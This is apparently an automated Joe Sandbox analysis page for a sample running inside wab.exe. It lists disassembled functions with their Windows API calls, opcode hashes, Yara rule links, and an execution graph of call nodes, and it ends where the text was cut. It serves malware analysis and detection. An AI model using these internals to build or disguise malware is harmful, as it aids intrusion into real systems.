                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,240C4AEA,?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000), ref: 240C4B59
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 240C4B6C
                  • FreeLibrary.KERNEL32(00000000,?,?,?,240C4AEA,?,?,240C4A8A,?,240D2238,0000000C,240C4BBD,00000000,00000000,00000001,240C2082), ref: 240C4B8F
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 10df336368a47e9c311408f52a73cdef39c41e60cadb9c2e29d561195d7e8cf7
                  • Instruction ID: 22d05fb577527d34ee987af2422e0b83ce6d68f72bc3b4bb50f888874f9ab34c
                  • Opcode Fuzzy Hash: 10df336368a47e9c311408f52a73cdef39c41e60cadb9c2e29d561195d7e8cf7
                  • Instruction Fuzzy Hash: 16F04F31900208FBDB119F95DC18F9DBFB9EF44761F104178F909A6150DB349AC1DA90
                  Function 240C7153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 240C715C
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 240C717F
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 240C71A5
                  • _free.LIBCMT ref: 240C71B8
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 240C71C7
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 2f9132d51b2a887dec8fe9a16b45611edaa0a8bcbb3e8cfbbce677979c47b72b
                  • Instruction ID: d5345745fb52eeed5329f595d19370ee4e58001986c28f08bdb4f05fea7d2b9d
                  • Opcode Fuzzy Hash: 2f9132d51b2a887dec8fe9a16b45611edaa0a8bcbb3e8cfbbce677979c47b72b
                  • Instruction Fuzzy Hash: 02018872601A16FF23120EBEDC48D7F7E6DDEC29A43100179FD04D7204DA649C8181B5
                  Function 240C5B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(00000000,?,00000000,240C636D,240C5713,00000000,?,240C2249,?,?,240C1D66,00000000,?,?,00000000), ref: 240C5B7F
                  • _free.LIBCMT ref: 240C5BB4
                  • _free.LIBCMT ref: 240C5BDB
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C5BE8
                  • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 240C5BF1
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 8a8128c33eef106a745a51e581d28f04a1c66bc33e9f3ecee4b26204107977c3
                  • Instruction ID: d33e3abc9993a33248079943437c4d6c2b53997b2a665582e604c884303aa4ec
                  • Opcode Fuzzy Hash: 8a8128c33eef106a745a51e581d28f04a1c66bc33e9f3ecee4b26204107977c3
                  • Instruction Fuzzy Hash: 4B01287E244A31E7A3031A78EC84E0F3EA9DFD15787210274FD15A2145EE78D9C64164
                  Function 240C1E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,?,240C10DF,?,?,?,00000000), ref: 240C1E9A
                  • lstrcatW.KERNEL32(?,?), ref: 240C1EAC
                  • lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EB3
                  • lstrlenW.KERNEL32(?,?,240C10DF,?,?,?,00000000), ref: 240C1EC8
                  • lstrcatW.KERNEL32(?,240C10DF), ref: 240C1ED3
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: lstrlen$lstrcat
                  • String ID:
                  • API String ID: 493641738-0
                  • Opcode ID: 818577b5661537bd1934b6ffe832aa025bf5573df9aa9b43705b3c21cbd08334
                  • Instruction ID: bb100f28af4b2ac6d79018577573b5220ea162af1ca9a7b738daae33b2f2f923
                  • Opcode Fuzzy Hash: 818577b5661537bd1934b6ffe832aa025bf5573df9aa9b43705b3c21cbd08334
                  • Instruction Fuzzy Hash: A1F08926500110FAD7213B19FC85F7F7B7CEFC6A60B14002DF608971909B54688296B5
                  Function 240C91B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 240C91D0
                    • Part of subcall function 240C571E: HeapFree.KERNEL32(00000000,00000000,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?), ref: 240C5734
                    • Part of subcall function 240C571E: GetLastError.KERNEL32(?,?,240C924F,?,00000000,?,00000000,?,240C9276,?,00000007,?,?,240C7E5A,?,?), ref: 240C5746
                  • _free.LIBCMT ref: 240C91E2
                  • _free.LIBCMT ref: 240C91F4
                  • _free.LIBCMT ref: 240C9206
                  • _free.LIBCMT ref: 240C9218
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 3f11574d2c88a9090a4c297151948b3e1c9b8b8020f696645c33efea45012c21
                  • Instruction ID: 0b276b41ab27b2335e73497093796dd6c24e3cbe4adbdccf7352368829816ac8
                  • Opcode Fuzzy Hash: 3f11574d2c88a9090a4c297151948b3e1c9b8b8020f696645c33efea45012c21
                  • Instruction Fuzzy Hash: 1BF06D71954A50DB8724DF58E6C5D0F7FE9EB203247600825FD49E7504CB34F8C08A64
                  Function 240C4BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 240C4C1D
                  • _free.LIBCMT ref: 240C4CE8
                  • _free.LIBCMT ref: 240C4CF2
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$FileModuleName
                  • String ID: C:\Program Files (x86)\windows mail\wab.exe
                  • API String ID: 2506810119-3377118234
                  • Opcode ID: 0e2128b0f8bdbc8aa121000796277b4119d120de6ba7d04e425ccab11f554626
                  • Instruction ID: 1fead8bfb58d1ff55287e37299285eee885c3455abe63f5dc83c64567da9a3ad
                  • Opcode Fuzzy Hash: 0e2128b0f8bdbc8aa121000796277b4119d120de6ba7d04e425ccab11f554626
                  • Instruction Fuzzy Hash: 68318DB1A10218FFEB11CF99C8C0D9EBBF9FB84714F1041A6F904A7210D6B08AC5DB50
                  Function 240C6C5F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 240C5AF6: GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                    • Part of subcall function 240C5AF6: _free.LIBCMT ref: 240C5B2D
                    • Part of subcall function 240C5AF6: SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                    • Part of subcall function 240C5AF6: _abort.LIBCMT ref: 240C5B74
                    • Part of subcall function 240C6D7E: _abort.LIBCMT ref: 240C6DB0
                    • Part of subcall function 240C6D7E: _free.LIBCMT ref: 240C6DE4
                    • Part of subcall function 240C69F3: GetOEMCP.KERNEL32(00000000,?,?,240C6C7C,?), ref: 240C6A1E
                  • _free.LIBCMT ref: 240C6CD7
                  • _free.LIBCMT ref: 240C6D0D
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _free$ErrorLast_abort
                  • String ID: `=&$$`=&$C
                  • API String ID: 2991157371-3427526162
                  • Opcode ID: 022b5abfd268cf4964bd8d63b7b1a44090a857cfede7d09773a9b6def276e68f
                  • Instruction ID: eab58a41accf6d1affe39a75f8e998626aff495334cff90906ed834e1ab46d7a
                  • Opcode Fuzzy Hash: 022b5abfd268cf4964bd8d63b7b1a44090a857cfede7d09773a9b6def276e68f
                  • Instruction Fuzzy Hash: 7D31E431904208EFE721CFE9D580B5D7BF5EF00724F2145A9E9049B291EB769EC0CB50
                  Function 240C86E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,240C6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 240C8731
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 240C87BA
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 240C87CC
                  • __freea.LIBCMT ref: 240C87D5
                    • Part of subcall function 240C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 240C5702
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: 693c1f276d75884ec480e119233cd13aca7ad829ca712f1f6cc67dd75e8d8c12
                  • Instruction ID: bc5333017f17e87fa215fb6f7cd91a47b99ddc59bdeeb3105dd69a32ad40da6d
                  • Opcode Fuzzy Hash: 693c1f276d75884ec480e119233cd13aca7ad829ca712f1f6cc67dd75e8d8c12
                  • Instruction Fuzzy Hash: D931CB32A0021AEBDF158F65CC80EAF7BA5EF44615F010279FD04EB290E735D994CBA8
                  Function 240C5CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,240C1D66,00000000,00000000,?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue), ref: 240C5D13
                  • GetLastError.KERNEL32(?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue,240CE190,FlsSetValue,00000000,00000364,?,240C5BC8), ref: 240C5D1F
                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,240C5C88,240C1D66,00000000,00000000,00000000,?,240C5E85,00000006,FlsSetValue,240CE190,FlsSetValue,00000000), ref: 240C5D2D
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: LibraryLoad$ErrorLast
                  • String ID:
                  • API String ID: 3177248105-0
                  • Opcode ID: 8b3724333a434cfa9f4fedb45b0b2582d053f35d6ed7335bfe2121735478d7da
                  • Instruction ID: 9a98a4ac64e2c997ecec0fcc30cbdcf4b55ccd52e2d58db6237b53c208b1dd35
                  • Opcode Fuzzy Hash: 8b3724333a434cfa9f4fedb45b0b2582d053f35d6ed7335bfe2121735478d7da
                  • Instruction Fuzzy Hash: 2E01843A711332EBC7214E68DC48F4E7B99EF456A1B610630FA0AE7181D734D981CAE0
                  Function 240C63F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 240C655C
                    • Part of subcall function 240C62BC: IsProcessorFeaturePresent.KERNEL32(00000017,240C62AB,00000000,?,?,?,?,00000016,?,?,240C62B8,00000000,00000000,00000000,00000000,00000000), ref: 240C62BE
                    • Part of subcall function 240C62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 240C62E0
                    • Part of subcall function 240C62BC: TerminateProcess.KERNEL32(00000000), ref: 240C62E7
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                  • String ID: *?$.
                  • API String ID: 2667617558-3972193922
                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction ID: fcd57e1b259bfe93c4e09c93ea6fd82b39b4f6f5dc3388f129c1da7a53bc5d51
                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                  • Instruction Fuzzy Hash: FB51E171E00209EFDB25CFE8C880AADBBF5FF58714F248569D804E7304E6359A818B50
                  Function 240C16AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: _strlen
                  • String ID: : $Se.
                  • API String ID: 4218353326-4089948878
                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction ID: bfc86eced29e8628a51e174fa075f2ce43330f8599d9266a38337becf41319d3
                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                  • Instruction Fuzzy Hash: E8110671900248EFDB11DFA8D840BDEFBFCEF29208F60405AE545EB252E6705B42CB65
                  Function 240C1EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                  Download Yara Rule
                  APIs
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 240C2903
                    • Part of subcall function 240C35D2: RaiseException.KERNEL32(?,?,?,240C2925,00000000,00000000,00000000,?,?,?,?,?,240C2925,?,240D21B8), ref: 240C3632
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 240C2920
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: Unknown exception
                  • API String ID: 3476068407-410509341
                  • Opcode ID: 3ef76b1e60837c693b61fe5ec87ecf922e167124c41d70449251064bfd1efb22
                  • Instruction ID: 30fb841d63171670eef017bce35496b84399cf867226b598aba76b7bff503647
                  • Opcode Fuzzy Hash: 3ef76b1e60837c693b61fe5ec87ecf922e167124c41d70449251064bfd1efb22
                  • Instruction Fuzzy Hash: B5F0F434E0030CF79B00E6A5EC44E5D77ACAF2CA54B508578EE149A894EB70EAD98581
                  Function 240C6D7E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 240C5AF6: GetLastError.KERNEL32(?,?,240C6C6C), ref: 240C5AFA
                    • Part of subcall function 240C5AF6: _free.LIBCMT ref: 240C5B2D
                    • Part of subcall function 240C5AF6: SetLastError.KERNEL32(00000000,?,?,240C6C6C), ref: 240C5B6E
                    • Part of subcall function 240C5AF6: _abort.LIBCMT ref: 240C5B74
                  • _abort.LIBCMT ref: 240C6DB0
                  • _free.LIBCMT ref: 240C6DE4
                  Strings
                  Memory Dump Source
                  • Source File: 00000008.00000002.3287085211.00000000240C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 240C0000, based on PE: true
                  • Associated: 00000008.00000002.3287068428.00000000240C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000008.00000002.3287085211.00000000240D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_8_2_240c0000_wab.jbxd
                  Similarity
                  • API ID: ErrorLast_abort_free
                  • String ID: `=&$
                  • API String ID: 289325740-3373021481
                  • Opcode ID: 95e9d2ac9842a6657695f58281e182621c3764762ca6965857b7f7310f8c341b
                  • Instruction ID: c0ee9724e44c059f7d2a15e9f0982cf555ee3eff2cc2b1bbfa5dc04b9910daa6
                  • Opcode Fuzzy Hash: 95e9d2ac9842a6657695f58281e182621c3764762ca6965857b7f7310f8c341b
                  • Instruction Fuzzy Hash: D1019275D11632DBC7219FA8C44065DB7A1FF18F24B15066AE910A7288CB7569C28FC5

                  Execution Graph

                  Execution Coverage:6.4%
                  Dynamic/Decrypted Code Coverage:9.2%
                  Signature Coverage:1.5%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:84
                  execution_graph 40406 441819 40409 430737 40406->40409 40408 441825 40410 430756 40409->40410 40422 43076d 40409->40422 40411 430774 40410->40411 40412 43075f 40410->40412 40423 43034a 40411->40423 40434 4169a7 11 API calls 40412->40434 40415 4307ce 40416 430819 memset 40415->40416 40427 415b2c 40415->40427 40416->40422 40417 43077e 40417->40415 40420 4307fa 40417->40420 40417->40422 40419 4307e9 40419->40416 40419->40422 40435 4169a7 11 API calls 40420->40435 40422->40408 40424 430359 40423->40424 40425 43034e 40423->40425 40424->40417 40436 415c23 memcpy 40425->40436 40428 415b42 40427->40428 40433 415b46 40427->40433 40429 415b94 40428->40429 40431 415b5a 40428->40431 40428->40433 40430 4438b5 10 API calls 40429->40430 40430->40433 40432 415b79 memcpy 40431->40432 40431->40433 40432->40433 40433->40419 40434->40422 40435->40422 40436->40424 37677 442ec6 19 API calls 37854 4152c6 malloc 37855 4152e2 37854->37855 37856 4152ef 37854->37856 37858 416760 11 API calls 37856->37858 37858->37855 37859 4466f4 37878 446904 37859->37878 37861 446700 GetModuleHandleA 37864 446710 __set_app_type __p__fmode __p__commode 37861->37864 37863 4467a4 37865 4467ac __setusermatherr 37863->37865 37866 4467b8 37863->37866 37864->37863 37865->37866 37879 4468f0 _controlfp 37866->37879 37868 4467bd _initterm __wgetmainargs _initterm 37869 44681e GetStartupInfoW 37868->37869 37870 446810 37868->37870 37872 446866 GetModuleHandleA 37869->37872 37880 41276d 37872->37880 37876 446896 exit 37877 44689d _cexit 37876->37877 37877->37870 37878->37861 37879->37868 37881 41277d 37880->37881 37923 4044a4 LoadLibraryW 37881->37923 37883 412785 37915 412789 37883->37915 37931 414b81 37883->37931 37886 4127c8 37937 412465 memset ??2@YAPAXI 37886->37937 37888 4127ea 37949 40ac21 37888->37949 37893 412813 37967 40dd07 memset 37893->37967 37894 412827 37972 40db69 memset 37894->37972 37897 412822 37993 4125b6 ??3@YAXPAX 37897->37993 37899 40ada2 _wcsicmp 37900 41283d 37899->37900 37900->37897 37903 412863 CoInitialize 37900->37903 37977 41268e 37900->37977 37997 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37903->37997 37905 41296f 37999 40b633 37905->37999 37910 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37914 412957 37910->37914 37920 4128ca 37910->37920 37914->37897 37915->37876 37915->37877 37916 4128d0 TranslateAcceleratorW 37917 412941 GetMessageW 37916->37917 37916->37920 37917->37914 37917->37916 37918 412909 IsDialogMessageW 37918->37917 37918->37920 37919 4128fd IsDialogMessageW 37919->37917 37919->37918 37920->37916 37920->37918 37920->37919 37921 41292b TranslateMessage DispatchMessageW 37920->37921 37922 41291f IsDialogMessageW 37920->37922 37921->37917 37922->37917 37922->37921 37924 4044cf GetProcAddress 37923->37924 37927 4044f7 37923->37927 37925 4044e8 FreeLibrary 37924->37925 37928 4044df 37924->37928 37926 4044f3 37925->37926 37925->37927 37926->37927 37929 404507 MessageBoxW 37927->37929 37930 40451e 37927->37930 37928->37925 37929->37883 37930->37883 37932 414b8a 37931->37932 37933 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37931->37933 38003 40a804 memset 37932->38003 37933->37886 37936 414b9e GetProcAddress 37936->37933 37938 4124e0 37937->37938 37939 412505 ??2@YAPAXI 37938->37939 37940 41251c 37939->37940 37942 412521 37939->37942 38025 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37940->38025 38014 444722 37942->38014 37948 41259b wcscpy 37948->37888 38030 40b1ab ??3@YAXPAX ??3@YAXPAX 37949->38030 37953 40ad4b 37962 40ad76 37953->37962 38054 40a9ce 37953->38054 37954 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37956 40ac5c 37954->37956 37956->37953 37956->37954 37957 40ace7 ??3@YAXPAX 37956->37957 37956->37962 38034 40a8d0 37956->38034 38046 4099f4 37956->38046 37957->37956 37961 40a8d0 7 API calls 37961->37962 38031 40aa04 37962->38031 37963 40ada2 37964 40adc9 37963->37964 37965 40adaa 37963->37965 37964->37893 37964->37894 37965->37964 37966 40adb3 _wcsicmp 37965->37966 37966->37964 37966->37965 38059 40dce0 37967->38059 37969 40dd3a GetModuleHandleW 38064 40dba7 37969->38064 37973 40dce0 3 API calls 37972->37973 37974 40db99 37973->37974 38136 40dae1 37974->38136 38150 402f3a 37977->38150 37979 412766 37979->37897 37979->37903 37980 4126d3 _wcsicmp 37981 4126a8 37980->37981 37981->37979 37981->37980 37983 41270a 37981->37983 38184 4125f8 7 API calls 37981->38184 37983->37979 38153 411ac5 37983->38153 37994 4125da 37993->37994 37995 4125f0 37994->37995 37996 4125e6 DeleteObject 37994->37996 37998 40b1ab ??3@YAXPAX ??3@YAXPAX 37995->37998 37996->37995 37997->37910 37998->37905 38000 40b640 37999->38000 38001 40b639 ??3@YAXPAX 37999->38001 38002 40b1ab ??3@YAXPAX ??3@YAXPAX 38000->38002 38001->38000 38002->37915 38004 40a83b GetSystemDirectoryW 38003->38004 38005 40a84c wcscpy 38003->38005 38004->38005 38010 409719 wcslen 38005->38010 38008 40a881 LoadLibraryW 38009 40a886 38008->38009 38009->37933 38009->37936 38011 409724 38010->38011 38012 409739 wcscat LoadLibraryW 38010->38012 38011->38012 38013 40972c wcscat 38011->38013 38012->38008 38012->38009 38013->38012 38015 444732 38014->38015 38016 444728 DeleteObject 38014->38016 38026 409cc3 38015->38026 38016->38015 38018 412551 38019 4010f9 38018->38019 38020 401130 38019->38020 38021 401134 GetModuleHandleW LoadIconW 38020->38021 38022 401107 wcsncat 38020->38022 38023 40a7be 38021->38023 38022->38020 38024 40a7d2 38023->38024 38024->37948 38024->38024 38025->37942 38029 409bfd memset wcscpy 38026->38029 38028 409cdb CreateFontIndirectW 38028->38018 38029->38028 38030->37956 38032 40aa14 38031->38032 38033 40aa0a ??3@YAXPAX 38031->38033 38032->37963 38033->38032 38035 40a8eb 38034->38035 38036 40a8df wcslen 38034->38036 38037 40a906 ??3@YAXPAX 38035->38037 38038 40a90f 38035->38038 38036->38035 38042 40a919 38037->38042 38039 4099f4 3 API calls 38038->38039 38039->38042 38040 40a932 38044 4099f4 3 API calls 38040->38044 38041 40a929 ??3@YAXPAX 38043 40a93e memcpy 38041->38043 38042->38040 38042->38041 38043->37956 38045 40a93d 38044->38045 38045->38043 38047 409a41 38046->38047 38048 4099fb malloc 38046->38048 38047->37956 38050 409a37 38048->38050 38051 409a1c 38048->38051 38050->37956 38052 409a30 ??3@YAXPAX 38051->38052 38053 409a20 memcpy 38051->38053 38052->38050 38053->38052 38055 40a9e7 38054->38055 38056 40a9dc ??3@YAXPAX 38054->38056 38058 4099f4 3 API calls 38055->38058 38057 40a9f2 38056->38057 38057->37961 38058->38057 38083 409bca GetModuleFileNameW 38059->38083 38061 40dce6 wcsrchr 38062 40dcf5 38061->38062 38063 40dcf9 wcscat 38061->38063 38062->38063 38063->37969 38084 44db70 38064->38084 38068 40dbfd 38087 4447d9 38068->38087 38071 40dc34 wcscpy wcscpy 38113 40d6f5 38071->38113 38072 40dc1f wcscpy 38072->38071 38075 40d6f5 3 API calls 38076 40dc73 38075->38076 38077 40d6f5 3 API calls 38076->38077 38078 40dc89 38077->38078 38079 40d6f5 3 API calls 38078->38079 38080 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38079->38080 38119 40da80 38080->38119 38083->38061 38085 40dbb4 memset memset 38084->38085 38086 409bca GetModuleFileNameW 38085->38086 38086->38068 38089 4447f4 38087->38089 38088 40dc1b 38088->38071 38088->38072 38089->38088 38090 444807 ??2@YAPAXI 38089->38090 38091 44481f 38090->38091 38092 444873 _snwprintf 38091->38092 38093 4448ab wcscpy 38091->38093 38126 44474a 8 API calls 38092->38126 38095 4448bb 38093->38095 38127 44474a 8 API calls 38095->38127 38097 4448a7 38097->38093 38097->38095 38098 4448cd 38128 44474a 8 API calls 38098->38128 38100 4448e2 38129 44474a 8 API calls 38100->38129 38102 4448f7 38130 44474a 8 API calls 38102->38130 38104 44490c 38131 44474a 8 API calls 38104->38131 38106 444921 38132 44474a 8 API calls 38106->38132 38108 444936 38133 44474a 8 API calls 38108->38133 38110 44494b 38134 44474a 8 API calls 38110->38134 38112 444960 ??3@YAXPAX 38112->38088 38114 44db70 38113->38114 38115 40d702 memset GetPrivateProfileStringW 38114->38115 38116 40d752 38115->38116 38117 40d75c WritePrivateProfileStringW 38115->38117 38116->38117 38118 40d758 38116->38118 38117->38118 38118->38075 38120 